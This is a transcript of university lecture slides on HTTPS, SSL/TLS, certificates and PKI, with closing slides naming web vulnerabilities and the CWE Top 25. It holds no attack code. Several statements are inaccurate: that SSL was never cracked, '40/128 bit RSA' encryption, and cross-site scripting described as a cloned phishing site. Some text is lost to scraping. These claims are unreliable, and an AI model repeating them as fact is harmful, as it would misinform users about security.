COMP2322 Networks in Organisations Richard Henson University of Worcester April 2016.

Slides:



Advertisements
Similar presentations
Internet Protocol Security (IP Sec)
Advertisements

Chapter 17: WEB COMPONENTS
SECURE SITES. A SECURE CONNECTION TERMS Secure Sockets Layer (SSL) An older Internet protocol that allows for data transmission between server and client.
Cryptography and Network Security
SSL CS772 Fall Secure Socket layer Design Goals: SSLv2) SSL should work well with the main web protocols such as HTTP. Confidentiality is the top.
Topic 8: Secure communication in mobile devices. Choice of secure communication protocols, leveraging SSL for remote authentication and using HTTPS for.
SECURITY IN E-COMMERCE VARNA FREE UNIVERSITY Prof. Teodora Bakardjieva.
1 Supplement III: Security Controls What security services should network systems provide? Confidentiality Access Control Integrity Non-repudiation Authentication.
6/3/2015topic1 Web Security Qiang Yang Simon Fraser University Thanks: Francis Lau (HKU)
Part 5:Security Network Security (Access Control, Encryption, Firewalls)
Client/Server Computing Model of computing in which very powerful personal computers (clients) are connected in a network with one or more server computers.
Electronic Transaction Security (E-Commerce)
Layer 7- Application Layer
Wireless Encryption By: Kara Dolansky Network Management Spring 2009.
How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.
SSL (Secure Socket Layer) and Secure Web Pages Rob Sodders, University of Florida CIS4930 “Advanced Web Design” Spring 2004
Softsmith Infotech Secure Socket Layer (SSL) and Tomcat.
CSCI 6962: Server-side Design and Programming
COMP2121 Internet Technology Richard Henson April 2011.
Secure Software Development Mini Zeng University of Alabama in Huntsville 1.
Web Servers Web server software is a product that works with the operating system The server computer can run more than one software product such as .
SYSTEM ADMINISTRATION Chapter 13 Security Protocols.
CHAPTER 2 PCs on the Internet Suraya Alias. The TCP/IP Suite of Protocols Internet applications – client/server applications The client requested data.
Principles of Computer Security: CompTIA Security + ® and Beyond, Third Edition © 2012 Principles of Computer Security: CompTIA Security+ ® and Beyond,
Security Management prepared by Dean Hipwell, CISSP
SSL and https for Secure Web Communication CSCI 5857: Encoding and Encryption.
CSI315 Web Development Technologies Continued. Communication Layer information needs to get from one place to another –Computer- Computer –Software- Software.
Implementing ISA Server Publishing. Introduction What Are Web Publishing Rules? ISA Server uses Web publishing rules to make Web sites on protected networks.
Chapter 13 – Network Security
Linux Networking and Security Chapter 8 Making Data Secure.
E-Commerce Security Technologies : Theft of credit card numbers Denial of service attacks (System not availability ) Consumer privacy (Confidentiality.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.0 Network Services Networking for Home and Small Businesses – Chapter 6.
Cosc 4765 SSL/TLS and VPN. SSL and TLS We can apply this generally, but also from a prospective of web services. Multi-layered: –S-http (secure http),
Protecting Internet Communications: Encryption  Encryption: Process of transforming plain text or data into cipher text that cannot be read by anyone.
COMP3121 E-Commerce Technologies Richard Henson University of Worcester November 2011.
E-Commerce Security Professor: Morteza Anvari Student: Xiaoli Li Student ID: March 10, 2001.
COMP3123 Internet Security Richard Henson University of Worcester November 2010.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
Fundamentals of Proxying. Proxy Server Fundamentals  Proxy simply means acting on someone other’s behalf  A Proxy acts on behalf of the client or user.
1 Chapter Overview Password Protection Security Models Firewalls Security Protocols.
1 Security Protocols in the Internet Source: Chapter 31 Data Communications & Networking Forouzan Third Edition.
COMP1321 Digital Infrastructures Richard Henson University of Worcester April 2013.
Lecture 16 Page 1 CS 236 Online Web Security CS 236 On-Line MS Program Networks and Systems Security Peter Reiher.
TCP/IP (Transmission Control Protocol / Internet Protocol)
COMP3123 Internet Security Richard Henson University of Worcester November 2011.
COMP3371 Cyber Security Richard Henson University of Worcester October 2015.
Database Security Cmpe 226 Fall 2015 By Akanksha Jain Jerry Mengyuan Zheng.
Chapter 1 The Software Security Problem. Goals of this course Become aware of common pitfalls. Static Analysis and tools.
1 Chapter Overview Creating Web Sites and FTP Sites Creating Virtual Directories Managing Site Security Troubleshooting IIS.
Digital Signatures and Digital Certificates Monil Adhikari.
Active Directory. Computers in organizations Computers are linked together for communication and sharing of resources There is always a need to administer.
IP Security (IPSec) Matt Hermanson. What is IPSec? It is an extension to the Internet Protocol (IP) suite that creates an encrypted and secure conversation.
APACHE Apache is generally recognized as the world's most popular Web server (HTTP server). Originally designed for Unix servers, the Apache Web server.
SSL: Secure Socket Layer By: Mike Weissert. Overview Definition History & Background SSL Assurances SSL Session Problems Attacks & Defenses.
1 Internet data security (HTTPS and SSL) Ruiwu Chen.
COMP3121 E-Commerce Technologies Richard Henson University of Worcester December 2009.
TOPIC: HTTPS (Security protocol)
SSL Certificates for Secure Websites
Secure Sockets Layer (SSL)
Chapter 8 Building the Transaction Database
Using SSL – Secure Socket Layer
COMP3371 Internet Security
COMP1321 Digital Infrastructures
Richard Henson University of Worcester October 2016
Chapter 7 Network Applications
Designing IIS Security (IIS – Internet Information Service)
Cryptography and Network Security
Exceptions and networking
Presentation transcript:

COMP2322 Networks in Organisations Richard Henson University of Worcester April 2016

Week 8: Network Services for Secure Web Pages n Objectives:  Explain how HTTPS/SSL/TLS fits into the OSI seven layer model  Take the necessary steps to implement an SSL system on a www server that uses EAP/TLS  Apply PKI principles to produce a workable for protecting web pages at the client end

Secure Sockets Layer (SSL) and Secure HTTP n Summary of SSL:  devised by Netscape  very successful  works with HTTP-S to only display the web page in a secure environment  never been cracked  Further developed by IETF n But how does it all fit together?

Back to the TCP/IP model TELNETFTP TCP/TLS SMTPHTTPhttp-s Session layer protocols: eg Unix “sockets”, SSL n Zoom in on TCP and the upper layers… Level 7 Level 5 Level 4

Secure HTTP (https) and the session layer n All application layer protocols communicate with TCP layer through unique TCP ports and (optional) session layer logon n Security can also be imposed, therefore, by authenticating at the “logon” layer  e.g. using Kerberos authentication  username/password is required before data can pass the session layer and be displayed by the browser

Secure Sockets and the Session Layer n In the early days of Unix, someone devised the concept of a “socket”:  a protocol between application and transport layers that TCP could plug in to with the help of a TCP port  network authentication could be handled by the “socket” n The concept continued, and was assimilated into the session layer n When Windows interfaced with TCP/IP for the first time, the term WINSOCK was introduced

The trouble with HTTP n General Internet principle of “anyone can go anywhere” n On a Windows system with www access:  TCP can link to HTTP through “Winsock”  session layer authentication not invoked  HTML data transferred directly to the presentation and application layers for display n Problem:  the data is visible to anyone else on the Internet who may have access to that machine and the data path to it!

Secure HTTP and the user authentication problem n Makes use of the potential for requiring authentication at the session layer n SSL protocol can require a username/password combination before data passes through the socket from transport layer to application layer application transport authentication required

Computer Authentication n SSL is able to use the PKI (remember that?) n When a user first attempts to communicate with a web server over a secure connection:  that server will present the web browser with authentication data  presented as a server certificate (remember those?) »verifies that the server is who and what it claims to be n Works both ways…  protocol: EAP/TLS  server may in return request client authentication via username/password

SSL and Encryption n Authenticating the user & server only helps when the data is at its at its source or destination  data also needs to be protected in transit… n SSL working at level 5/6 also ensures that it is: »encrypted before being sent »decrypted upon receipt and prior to processing for display

Confidentiality & Integrity n Encryption of SSL responses can be  Either Standard 40 bit RSA »difficult to break confidentiality  Or Secure 128 bit RSA »virtually impossible to “crack” n Guarantee that the data will not be modified in transit by a third party  integrity therefore also maintained

Is an SSL Digital Certificate Really Necessary? n Yes:  for sites involved in e-commerce and therefore involving digital payment with authentication  any other business transaction in which authentication is important n No:  if an administrator simply wants to ensure that data being transmitted and received by the server is private and cannot be snooped by anyone eavesdropping on the connection  In such cases, a self-signed certificate is sufficient

The Web of Trust (PGP) n Based on individual trust networks built up between individuals n Possible to “self sign” a digital certificate  if someone trusts you, a self-signature may be all they need  OpenPGP identiity certificates are designed to be self-signed

Verisign Trust System n Web of Trust  OK for academics (“good” people?)  but bad” people can also do business… n Verisign system developed by Internet/Business experts  Intention: people could trust strangers in web-based business transactions  financial institutions provide the “trust”

General Tips on Running SSL n Secure websites…  designed to be as efficient as securely possible »problem: encryption/decryption is computationally expensive from a performance standpoint  not strictly necessary to run an entire Web application over SSL »customary for a developer to find out decide which pages require a secure connection and which do not »and create secure and non-secure folder structures for the respective web pages

Installing a Server Certificate on Windows Servers that will support https n VvcyPqMk0 VvcyPqMk0 VvcyPqMk0

When to use SSL n Whenever web pages require a secure connection with the server e.g.:  login pages  personal information pages  shopping cart checkouts  any pages where credit card information could possibly be transmitted

Running HTTPS n A client-server service that runs on the Web server (like http, smtp, and ftp)  uniquely designed so it will not run on a server without an installed and active server certificate n Once the service has been set up, https will require users to establish an encrypted channel with the server  i.e.  rather than n Until the user does use https they will get an error, rather than the pop up that proceeds the secure web page

Running HTTPS n Use of encryption can interfere with access to data… (i.e. availability)  an encrypted channel running https requires that the user's Web browser and the Web server BOTH support the same encryption scheme n For example:  IF an IIS Web Server is set to use default secure communication settings  THEN the client Web browser must support a session key strength of 40 bits, or greater

Accessing a Web Page using HTTPS n If the client is to request a page that needs SSL:  in the HTML code that will call that page, prefix the address with instead of »the system will do the rest… n Any pages which absolutely require a secure connection need to:  check the protocol type associated with the page request  take appropriate action if https: is not specified

Has a Web Page has been delivered securely using SSL? n 1. (depending on browser settings)  pop up appears…  informs the client that they are entering a secure client-server connection  must be acknowledged to continue n 2. Web page displayed:  will appear before the URL  “lock” symbol appears on the bottom left of the screen

How secure are your mobile apps? n Possible vulnerabilities (exploit poor programming):  MITM attack (capture of code en route) »much easier on wireless networks  SQL injection »unprotected data windows »needs input validation controls  DOS & DDOS »exploitations that invokes ping

More Vulnerabilities… n Cross-site Scripting  cunning method of capturing data by creating a false website  website looks identical to original… »traffic diverted to IP address of website clone »users feed in personal data etc. into HTML or web forms and that personal data is stolen n Buffer overflow  poor programming technique allows secure data to be written to an open area of memory where it can be easily extracted

CWE Top 25 faults (1) Rank IDName 1CWE-79Failure to Preserve Web Page Structure ('Cross-site Scripting') 2CWE-89Improper Sanitization of Special Elements used in an SQL Command ('SQL Injection') 3CWE-120Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') 4CWE-352Cross-Site Request Forgery (CSRF) 5CWE-285Improper Access Control (Authorization) 6CWE-807Reliance on Untrusted Inputs in a Security Decision 7CWE-22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') 8CWE-434Unrestricted Upload of File with Dangerous Type 9CWE-78Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection') 10CWE-311Missing Encryption of Sensitive Data 11CWE-798Use of Hard-coded Credentials 12CWE-805Buffer Access with Incorrect Length Value 13CWE-98Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion') [TSI/2012/183] © Copyright

CWE Top 25 faults (2) RankIDName 14CWE-129Improper Validation of Array Index 15CWE-754Improper Check for Unusual or Exceptional Conditions 16CWE-209Information Exposure Through an Error Message 17CWE-190Integer Overflow or Wraparound 18CWE-131Incorrect Calculation of Buffer Size 19CWE-306Missing Authentication for Critical Function 20CWE-494Download of Code Without Integrity Check 21CWE-732Incorrect Permission Assignment for Critical Resource 22CWE-770Allocation of Resources Without Limits or Throttling 23CWE-601URL Redirection to Untrusted Site ('Open Redirect') 24CWE-327Use of a Broken or Risky Cryptographic Algorithm 25CWE-362Race Condition [TSI/2012/183] © Copyright

Hot off the Press… n This is reality, 5/4/2016 (i.e. today!):  442/websites-vulnerable-to-tls-certificate- man-in-the-middle-attacks 442/websites-vulnerable-to-tls-certificate- man-in-the-middle-attacks 442/websites-vulnerable-to-tls-certificate- man-in-the-middle-attacks

Thanks for Listening Thanks for Listening

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.